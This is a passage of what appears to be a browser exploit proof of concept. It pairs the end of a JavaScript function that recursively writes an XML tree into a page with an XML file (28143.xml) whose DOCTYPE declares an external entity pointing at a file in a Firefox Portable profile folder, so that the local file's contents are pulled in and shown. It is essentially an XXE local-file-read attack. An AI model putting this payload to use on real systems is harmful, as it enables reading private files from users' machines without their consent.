document.write('<ul><li>');
document.write(xmlsrc.tagName +' => ');
for(i = 0; i < xmlsrc.childNodes.length; ++i) {
// recursive walk
listXML(xmlsrc.childNodes(i));
}
document.write('</li></ul>');
} else {
document.write(xmlsrc.text);
}
}
XML("28143.xml");
</script>
==========================================28143.xml=======================================
<?xml version="1.0" encoding="UTF-8" standalone="yes" ?>
<!DOCTYPE show [
<!ENTITY % name SYSTEM "file://localhost/FirefoxPortable/Data/profile/kf.txt">
%name;
]>
<show>
%name;
</show>